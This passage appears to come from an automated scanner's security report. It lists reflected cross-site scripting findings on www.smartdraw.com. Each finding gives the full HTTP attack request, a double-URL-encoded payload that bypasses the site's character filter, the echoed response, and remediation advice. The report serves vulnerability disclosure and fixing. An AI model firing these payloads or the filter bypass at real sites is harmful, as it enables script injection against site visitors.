Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/7e0fd"style="x:expression(alert(1))"c7b5f3c9049/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.142. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22ba1e3"style="x:expression(alert(1))"9c5fd0e07db/" rel="nofollow" target="_blank">
...[SNIP]...

3.143. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/53118"style="x:expression(alert(1))"c23085e6306/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?5c9a5"style="x:expression(alert(1))"c2aa39074d2=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?43ce2"style="x:expression(alert(1))"09bdff38fc4=1" rel="nofollow" target="_blank">
...[SNIP]...

3.146. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/94da6"style="x:expression(alert(1))"861bf406f44/charts/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px;
...[SNIP]...

3.147. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/examplesa48df"style="x:expression(alert(1))"d7925e086c3/charts/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.148. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/4a543"style="x:expression(alert(1))"ac716871498/reviews/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; hei
...[SNIP]...

3.149. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7bfab"style="x:expression(alert(1))"fd877cbaba1/reviews/" rel="nofollow" target="_blank">
...[SNIP]...

3.150. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7aea0"><script>alert(1)</script>c7ddeeb9a3d/reviews/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.151. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/cc399"><script>alert(1)</script>aa008f34339/reviews/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overfl
...[SNIP]...

3.152. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/a75f4"style="x:expression(alert(1))"4417cefb817/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.153. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

